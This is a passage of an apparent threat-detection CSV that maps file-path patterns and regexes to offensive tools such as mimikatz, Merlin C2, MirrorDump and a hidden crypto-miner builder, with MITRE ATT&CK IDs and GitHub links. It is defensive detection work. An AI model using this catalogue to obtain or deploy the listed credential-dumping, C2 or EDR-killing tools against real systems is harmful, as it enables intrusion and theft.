minutes.","T1046","TA0007","N/A","N/A","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","N/A","N/A","10","22663","2991","2024-03-15T06:32:42Z","2013-07-28T05:35:33Z" "*\master\GPSCoordinates\*",".{0,1000}\\master\\GPSCoordinates\\.{0,1000}","offensive_tool_keyword","GPSCoordinates","Tracks the system's GPS coordinates (accurate within 1km currently) if Location Services are enabled","T1018 - T1059.001","TA0001 - TA0002","N/A","N/A","Reconnaissance","https://github.com/matterpreter/OffensiveCSharp/tree/master/GPSCoordinates","1","0","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*\Mayhem.psm1*",".{0,1000}\\Mayhem\.psm1.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*\MeasureObjectCommand.cs",".{0,1000}\\MeasureObjectCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\mem_dll.pdb*",".{0,1000}\\mem_dll\.pdb.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation 
tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*\merlin.dll*",".{0,1000}\\merlin\.dll.{0,1000}","offensive_tool_keyword","merlin-agent-dll","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent-dll","1","0","N/A","10","10","49","13","2024-04-23T04:53:57Z","2021-04-17T16:58:24Z" "*\merlin\data\modules\*",".{0,1000}\\merlin\\data\\modules\\.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*\merlinAgent-*.exe*",".{0,1000}\\merlinAgent\-.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*\merlin-agent\*.go*",".{0,1000}\\merlin\-agent\\.{0,1000}\.go.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - 
TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*\merlin-agent-dll*",".{0,1000}\\merlin\-agent\-dll.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*\merlin-agent-dll\*",".{0,1000}\\merlin\-agent\-dll\\.{0,1000}","offensive_tool_keyword","merlin-agent-dll","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent-dll","1","0","N/A","10","10","49","13","2024-04-23T04:53:57Z","2021-04-17T16:58:24Z" "*\met_inject.py*",".{0,1000}\\met_inject\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\metasploit.go*",".{0,1000}\\metasploit\.go.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*\Meterpeter_*.zip*",".{0,1000}\\Meterpeter_.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in 
post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\mhydeath64*",".{0,1000}\\mhydeath64.{0,1000}","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","0","N/A","10","4","345","63","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z" "*\mimi32.exe*",".{0,1000}\\mimi32\.exe.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*\mimi64.exe*",".{0,1000}\\mimi64\.exe.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*\mimidogz-master*",".{0,1000}\\mimidogz\-master.{0,1000}","offensive_tool_keyword","mimidogz","Rewrite of Invoke-Mimikatz.ps1 to avoid AV detection","T1055 - T1560.001 - T1110.001 - T1003 - T1071","TA0005 - TA0040 - TA0006","N/A","N/A","Credential Access","https://github.com/projectb-temp/mimidogz","1","0","N/A","10","1","0","0","2019-02-11T10:14:10Z","2019-02-11T10:12:08Z" "*\mimikatz.bin*",".{0,1000}\\mimikatz\.bin.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042????","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","0","N/A","10","3","221","48","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z" "*\mimikatz.py*",".{0,1000}\\mimikatz\.py.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*\mimilib.dll*",".{0,1000}\\mimilib\.dll.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash dumps","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/bmarchev/Forensike","1","0","N/A","10","1","17","2","2024-03-18T10:40:58Z","2024-02-01T13:52:55Z" 
"*\mimipy.py*",".{0,1000}\\mimipy\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*\MineDownloader.vbs*",".{0,1000}\\MineDownloader\.vbs.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\MinerETH.cs*",".{0,1000}\\MinerETH\.cs.{0,1000}","offensive_tool_keyword","SilentCryptoMiner","A Silent (Hidden) Free Crypto Miner Builder","T1496 - T1055 - T1546 - T1082 - T1574","TA0042 - TA0005 - TA0003 - TA0009","N/A","N/A","Cryptomining","https://github.com/UnamSanctam/SilentCryptoMiner","1","0","N/A","9","10","1032","252","2024-04-11T01:25:28Z","2021-11-08T09:03:32Z" "*\MinerXMR.cs*",".{0,1000}\\MinerXMR\.cs.{0,1000}","offensive_tool_keyword","SilentCryptoMiner","A Silent (Hidden) Free Crypto Miner 
Builder","T1496 - T1055 - T1546 - T1082 - T1574","TA0042 - TA0005 - TA0003 - TA0009","N/A","N/A","Cryptomining","https://github.com/UnamSanctam/SilentCryptoMiner","1","0","N/A","9","10","1032","252","2024-04-11T01:25:28Z","2021-11-08T09:03:32Z" "*\MiniDump.ps1*",".{0,1000}\\MiniDump\.ps1.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*\minidump-rs.exe*",".{0,1000}\\minidump\-rs\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*\MiniDumpToMem.cs*",".{0,1000}\\MiniDumpToMem\.cs.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","0","N/A","10","3","258","59","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z" "*\mipsel_agent*",".{0,1000}\\mipsel_agent.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","10","10","2419","382","2024-04-11T05:50:18Z","2019-11-15T03:25:50Z" 
"*\MirrorDump.csproj*",".{0,1000}\\MirrorDump\.csproj.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","0","N/A","10","3","258","59","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z" "*\MirrorDump.exe*",".{0,1000}\\MirrorDump\.exe.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","0","N/A","10","3","258","59","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z" "*\MirrorDump.sln*",".{0,1000}\\MirrorDump\.sln.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","0","N/A","10","3","258","59","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z" "*\MirrorDump\MinHook*",".{0,1000}\\MirrorDump\\MinHook.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","0","N/A","10","3","258","59","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z" "*\MirrorDump\MiniDump\*",".{0,1000}\\MirrorDump\\MiniDump\\.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in 
memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","0","N/A","10","3","258","59","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z" "*\MirrorDump-master*",".{0,1000}\\MirrorDump\-master.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","0","N/A","10","3","258","59","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z" "*\MITMRecorder.py*",".{0,1000}\\MITMRecorder\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*\Mockingjay_BOF.*",".{0,1000}\\Mockingjay_BOF\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) Conversion of the Mockingjay Process Injection Technique","T1055.012 - T1059.001 - T1027.002","TA0002 - TA0005","N/A","N/A","C2","https://github.com/ewby/Mockingjay_BOF","1","0","N/A","9","10","143","16","2023-11-07T19:04:03Z","2023-08-27T06:01:28Z" "*\modifiableautorun.o*",".{0,1000}\\modifiableautorun\.o.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","9","4","330","38","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" 
"*\Module_Stomping.py*",".{0,1000}\\Module_Stomping\.py.{0,1000}","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","9","5","429","52","2023-12-19T22:58:03Z","2023-05-15T13:02:54Z" "*\Modules\Backdoor.cs*",".{0,1000}\\Modules\\Backdoor\.cs.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "*\monkey.exe *",".{0,1000}\\monkey\.exe\s.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","0","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*\monkey32.exe*",".{0,1000}\\monkey32\.exe.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*\monkey64.exe*",".{0,1000}\\monkey64\.exe.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*\Moriarty.exe*",".{0,1000}\\Moriarty\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# 
offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\mortar\Lib\shell_loader.pas*",".{0,1000}\\mortar\\Lib\\shell_loader\.pas.{0,1000}","offensive_tool_keyword","mortar","red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. Mortar is able to bypass modern anti-virus products and advanced XDR solutions","T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562","TA0002 - TA0003 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","0","N/A","10","10","1347","219","2023-12-21T22:00:38Z","2021-11-25T16:49:47Z" "*\mouselogger.py*",".{0,1000}\\mouselogger\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*\ms17-010.py*",".{0,1000}\\ms17\-010\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\msfnonstaged.exe*",".{0,1000}\\msfnonstaged\.exe.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*\MSFRottenPotato.h*",".{0,1000}\\MSFRottenPotato\.h.{0,1000}","offensive_tool_keyword","ADCSCoercePotato","coercing machine authentication but specific for ADCS server","T1187","TA0006","N/A","N/A","Credential Access","https://github.com/decoder-it/ADCSCoercePotato","1","0","N/A","10","2","176","23","2024-02-28T22:37:14Z","2024-02-26T12:08:34Z" "*\msfstaged.exe*",".{0,1000}\\msfstaged\.exe.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation 
tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*\Mshikaki.cpp*",".{0,1000}\\Mshikaki\.cpp.{0,1000}","offensive_tool_keyword","Mshikaki","A shellcode injection tool capable of bypassing AMSI. Features the QueueUserAPC() injection technique and supports XOR encryption","T1055.012 - T1116 - T1027.002 - T1562.001","TA0005 - TA0006 - TA0040 - TA0002","N/A","N/A","Exploitation tools","https://github.com/trevorsaudi/Mshikaki","1","0","N/A","9","2","131","25","2023-11-26T18:13:40Z","2023-09-03T16:35:50Z" "*\msi_search.c*",".{0,1000}\\msi_search\.c.{0,1000}","offensive_tool_keyword","msi-search","This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file to investigate local privilege escalation vulnerabilities through MSI repairs","T1005 ","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/mandiant/msi-search","1","0","N/A","10","3","232","26","2023-07-20T18:12:49Z","2023-06-29T18:31:56Z" "*\msi_search.exe*",".{0,1000}\\msi_search\.exe.{0,1000}","offensive_tool_keyword","msi-search","This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file to investigate local privilege escalation vulnerabilities through MSI repairs","T1005 ","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/mandiant/msi-search","1","0","N/A","10","3","232","26","2023-07-20T18:12:49Z","2023-06-29T18:31:56Z" "*\msi_search.ps1*",".{0,1000}\\msi_search\.ps1.{0,1000}","offensive_tool_keyword","msi-search","This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file to investigate local privilege escalation vulnerabilities through MSI repairs","T1005 ","TA0007 - 
TA0003","N/A","N/A","Discovery","https://github.com/mandiant/msi-search","1","0","N/A","10","3","232","26","2023-07-20T18:12:49Z","2023-06-29T18:31:56Z" "*\msi_search.x64.o*",".{0,1000}\\msi_search\.x64\.o.{0,1000}","offensive_tool_keyword","msi-search","This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file to investigate local privilege escalation vulnerabilities through MSI repairs","T1005 ","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/mandiant/msi-search","1","0","N/A","10","3","232","26","2023-07-20T18:12:49Z","2023-06-29T18:31:56Z" "*\msi_search.x86.o*",".{0,1000}\\msi_search\.x86\.o.{0,1000}","offensive_tool_keyword","msi-search","This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file to investigate local privilege escalation vulnerabilities through MSI repairs","T1005 ","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/mandiant/msi-search","1","0","N/A","10","3","232","26","2023-07-20T18:12:49Z","2023-06-29T18:31:56Z" "*\msol.py*",".{0,1000}\\msol\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\MSOL\DomainCompanyInfo.txt*",".{0,1000}\\MSOL\\DomainCompanyInfo\.txt.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation 
tools","https://github.com/NetSPI/MicroBurst","1","0","N/A","6","10","1905","305","2024-04-19T17:38:56Z","2018-07-16T16:47:20Z" "*\mssql_priv.py*",".{0,1000}\\mssql_priv\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\MultiDump.c*",".{0,1000}\\MultiDump\.c.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","N/A","10","5","401","49","2024-04-17T08:06:17Z","2024-02-02T05:56:29Z" "*\MultiDump.exe*",".{0,1000}\\MultiDump\.exe.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential 